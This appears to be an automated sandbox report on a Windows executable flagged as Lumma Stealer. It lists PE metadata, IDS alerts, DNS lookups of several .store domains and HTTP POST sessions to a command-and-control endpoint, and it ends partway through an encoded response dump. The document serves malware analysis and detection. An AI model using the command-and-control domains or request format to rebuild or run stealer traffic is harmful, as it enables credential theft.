SHA512: 16111fe7ddb9a2fd5ea23741ee1077405beefdf330b5af015cad91ae9adac6df19217960b0c6c609e6661677b44d5d65140bf2c3b40ce01b85b25816780abac6
SSDEEP: 49152:aZwD/W7/xk4ubIuO3NHX4DmYsF4KG4ErqGjmfcT4:6wDe7pk4qIuOdu9sF4KpE/jmkT
TLSH: B0D55C92B54672DFD88E17749527CF81692C02FE0B2825C3A86C76BE7D63DC11BB6C24
                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p0...........@...........................0.......-...@.................................T...h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x707000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b

Instruction
jmp 00007F02B87D347Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x58000 | 0x27e00 | f4cea0e367fd0c299b6115b6cc0ade8f | False | 0.9978325822884012 | data | 7.968774204528531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tenlogwb | 0x5b000 | 0x2ab000 | 0x2aa400 | d3b563b6b8014f25a5b444f50be2e274 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zqaausgd | 0x306000 | 0x1000 | 0x400 | c990af7d5db0e8d7a0ca97e85ebc6538 | False | 0.7724609375 | data | 6.027948079308269 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x307000 | 0x3000 | 0x2200 | d558bb2935044e88af1d4985be83df1a | False | 0.07961856617647059 | DOS executable (COM) | 1.1925215260271207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T18:43:08.002228+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-28T18:43:08.002228+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-28T18:43:09.203893+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-28T18:43:09.203893+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-28T18:44:58.474401+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49989 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 18:43:06.429733992 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:06.429779053 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:06.430255890 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:06.432794094 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:06.432809114 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:07.094464064 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:07.094605923 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:07.194138050 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:07.194163084 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:07.194469929 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:07.248435020 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:07.445482016 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:07.445717096 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:07.445741892 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.002239943 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.002338886 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.002412081 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.004106045 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.004128933 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.004143953 CET | 49709 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.004149914 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.057934999 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.057962894 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.058023930 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.058348894 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.058367968 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.672694921 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.672842026 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.674031973 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.674041986 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.674272060 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:08.675584078 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.675617933 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:08.675658941 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.203948021 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204082966 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204145908 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.204164982 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204262018 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204308033 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.204315901 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204715967 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204770088 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.204777956 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204875946 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.204925060 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.204932928 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.205437899 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.205491066 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.205497980 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.251600027 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.320847034 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321011066 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321099997 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.321120024 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321259975 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321336031 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.321366072 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321576118 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321640968 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.321698904 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.321716070 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.321728945 CET | 49711 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.321734905 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.419085979 CET | 49712 | 443 | 192.168.2.6 | 188.114.96.3
Oct 28, 2024 18:43:09.419122934 CET | 443 | 49712 | 188.114.96.3 | 192.168.2.6
Oct 28, 2024 18:43:09.419193029 CET | 49712 | 443 | 192.168.2.6 | 188.114.96.3
                                                                          Oct 28, 2024 18:43:09.419506073 CET49712443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:43:09.419517994 CET44349712188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:43:10.040123940 CET44349712188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:43:10.040262938 CET49712443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:43:10.041536093 CET49712443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:43:10.041546106 CET44349712188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:43:10.042615891 CET44349712188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:43:10.043766022 CET49712443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:43:10.043878078 CET49712443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:43:10.043982029 CET44349712188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:06.264763117 CET49712443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.055073023 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.055150986 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:07.055232048 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.055527925 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.055560112 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:07.667871952 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:07.667984009 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.669483900 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.669529915 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:07.669905901 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:07.678344011 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.678523064 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.678564072 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:07.678620100 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:07.678632975 CET44349972188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:09.350040913 CET49972443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.192183018 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.192222118 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:10.192358971 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.192696095 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.192715883 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:10.827450037 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:10.827548981 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.829235077 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.829245090 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:10.829477072 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:10.830730915 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.830861092 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.830890894 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:10.830943108 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:10.830954075 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:22.019841909 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:22.019953966 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:22.020036936 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:22.020411968 CET49987443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:22.020430088 CET44349987188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:22.468208075 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:22.468261003 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:22.468336105 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:22.468697071 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:22.468719959 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:23.084079027 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:23.084176064 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:23.089569092 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:23.089590073 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:23.089992046 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:23.121890068 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:23.122157097 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:23.122176886 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:58.474380970 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:58.474519968 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:58.474565029 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:58.474800110 CET49989443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:58.474811077 CET44349989188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:59.395777941 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:59.395821095 CET44349991188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:44:59.395992994 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:59.397722006 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:44:59.397738934 CET44349991188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.247606993 CET44349991188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.247684002 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.250123978 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.250129938 CET44349991188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.250438929 CET44349991188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.282743931 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.282876015 CET44349991188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.282943964 CET49991443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.333547115 CET49992443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.333606005 CET44349992188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.333671093 CET49992443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.334012032 CET49992443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.334023952 CET44349992188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.950377941 CET44349992188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.950505018 CET49992443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.953758955 CET49992443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.953779936 CET44349992188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.954200983 CET44349992188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.956130028 CET49992443192.168.2.6188.114.96.3
                                                                          Oct 28, 2024 18:45:00.956198931 CET44349992188.114.96.3192.168.2.6
                                                                          Oct 28, 2024 18:45:00.956254959 CET49992443192.168.2.6188.114.96.3
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Oct 28, 2024 18:43:06.306981087 CET  59933        53         192.168.2.6  1.1.1.1
Oct 28, 2024 18:43:06.317289114 CET  53           59933      1.1.1.1      192.168.2.6
Oct 28, 2024 18:43:06.344440937 CET  49442        53         192.168.2.6  1.1.1.1
Oct 28, 2024 18:43:06.354510069 CET  53           49442      1.1.1.1      192.168.2.6
Oct 28, 2024 18:43:06.356857061 CET  61747        53         192.168.2.6  1.1.1.1
Oct 28, 2024 18:43:06.367405891 CET  53           61747      1.1.1.1      192.168.2.6
Oct 28, 2024 18:43:06.369632959 CET  61003        53         192.168.2.6  1.1.1.1
Oct 28, 2024 18:43:06.391571045 CET  53           61003      1.1.1.1      192.168.2.6
Oct 28, 2024 18:43:06.393260002 CET  56113        53         192.168.2.6  1.1.1.1
Oct 28, 2024 18:43:06.419471025 CET  53           56113      1.1.1.1      192.168.2.6

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Oct 28, 2024 18:43:06.306981087 CET  192.168.2.6  1.1.1.1  0x125f    Standard query (0)  presticitpo.store   A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.344440937 CET  192.168.2.6  1.1.1.1  0x13f4    Standard query (0)  crisiwarny.store    A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.356857061 CET  192.168.2.6  1.1.1.1  0x8427    Standard query (0)  fadehairucw.store   A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.369632959 CET  192.168.2.6  1.1.1.1  0x7994    Standard query (0)  thumbystriw.store   A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.393260002 CET  192.168.2.6  1.1.1.1  0xcd61    Standard query (0)  necklacedmny.store  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                CName  Address       Type            Class        DNS over HTTPS
Oct 28, 2024 18:43:06.317289114 CET  1.1.1.1    192.168.2.6  0x125f    Name error (3)  presticitpo.store   none   none          A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.354510069 CET  1.1.1.1    192.168.2.6  0x13f4    Name error (3)  crisiwarny.store    none   none          A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.367405891 CET  1.1.1.1    192.168.2.6  0x8427    Name error (3)  fadehairucw.store   none   none          A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.391571045 CET  1.1.1.1    192.168.2.6  0x7994    Name error (3)  thumbystriw.store   none   none          A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.419471025 CET  1.1.1.1    192.168.2.6  0xcd61    No error (0)    necklacedmny.store         188.114.96.3  A (IP address)  IN (0x0001)  false
Oct 28, 2024 18:43:06.419471025 CET  1.1.1.1    192.168.2.6  0xcd61    No error (0)    necklacedmny.store         188.114.97.3  A (IP address)  IN (0x0001)  false
• necklacedmny.store

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49709        188.114.96.3    443               5936  C:\Users\user\Desktop\file.exe

Timestamp  Bytes transferred  Direction  Data
2024-10-28 17:43:07 UTC  265  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: necklacedmny.store
2024-10-28 17:43:07 UTC  8  OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-28 17:43:07 UTC  1011  IN
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 17:43:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ip9bsv6jpsdamboau4jvrv39io; expires=Fri, 21 Feb 2025 11:29:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAxvRzWlMBtnM649aTzR81LNUUVqzu1buTjnGOb8NdpyEuKTSsdXNm8RO1335Yqxqc2n7F7gBvfwouiKY3%2FYEbn74ubwomtvJpaM8BNZ5JMtxasHJO7tuWZDcb4v6U%2BriLcyuCQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d9cb9eff84e4624-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2433613&cwnd=251&unsent_bytes=0&cid=e518fa33fece2d53&ts=937&x=0"
2024-10-28 17:43:07 UTC  7  IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-28 17:43:07 UTC  5  IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49711        188.114.96.3    443               5936  C:\Users\user\Desktop\file.exe

Timestamp  Bytes transferred  Direction  Data
2024-10-28 17:43:08 UTC  266  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: necklacedmny.store
2024-10-28 17:43:08 UTC  52  OUT
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-28 17:43:09 UTC  1013  IN
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2024 17:43:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=o93eb5c211mo5h6inudv72udm7; expires=Fri, 21 Feb 2025 11:29:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFzLS8K8GZFQ5o%2Fd2YyqkqMJe0C29DSV4rU7KtkVkn0dxrX8tmcaJGHgf0Tak8buSo7IJTHBziaBb9dhIp2%2BXBLEIrw8cKc%2BArHcTG33QV6xN8ehLLhXWAYvrBT5dnnA963IL6I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d9cb9f7aa927d55-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2779270&cwnd=250&unsent_bytes=0&cid=45617256f76051cd&ts=540&x=0"
                                                                          Data Ascii: 96obx71E9YacqirN+2b23QL2JAuJAq81r6NjTExUX/G//gvj4QDsjwHLAuy6Gk/gJ9NIVtBXohGvTh9NTBR3nD6/bpq1JZHencorkbM/E5Qni0lT3X6nMKMGV1DVraKZX+pvnwWgtdOpi3a1ylIf5R72EU7oNtIpz7tbbS2oB/EK81LbKVSRg4HLb8RmbifFeq9JdtEv7knuZ1pcaFRfsCKfZpagGeHGpfYqqftnWuQmo0ku0CrjYOdGVhQgScY
                                                                          2024-10-28 17:43:09 UTC1369INData Raw: 32 36 65 34 0d 0a 31 52 44 6d 58 37 33 4a 50 64 54 52 72 54 56 57 57 62 46 56 39 34 33 49 77 58 67 6e 62 2b 52 71 69 49 30 6f 6a 4a 54 30 54 4c 32 73 4c 66 70 4b 72 38 30 6c 30 5a 62 54 52 52 56 41 2f 41 4c 46 7a 4c 36 2f 61 57 51 75 2f 79 53 53 2f 41 75 43 69 76 6c 4f 72 49 4e 65 31 31 75 32 78 53 44 57 31 74 31 4c 55 77 2f 6b 43 72 4c 4d 38 75 34 57 63 6a 36 31 50 35 2f 76 61 64 48 57 36 41 65 6a 30 67 57 30 46 65 6d 45 61 38 58 57 79 30 73 53 51 62 46 62 2f 34 4c 31 37 55 51 73 62 66 46 6e 6a 59 49 41 6f 49 6e 38 52 62 65 64 47 4d 70 7a 6d 73 63 67 32 35 75 63 41 47 74 78 71 56 6e 79 67 76 48 70 52 32 6f 67 70 32 75 4b 35 41 66 42 7a 4c 64 32 39 4e 49 4c 74 42 58 37 2f 79 6a 5a 6d 4a 51 64 52 41 4b 64 56 2f 65 41 2b 2f 42 64 61 69 43 6e 59 6f 72 6b 62
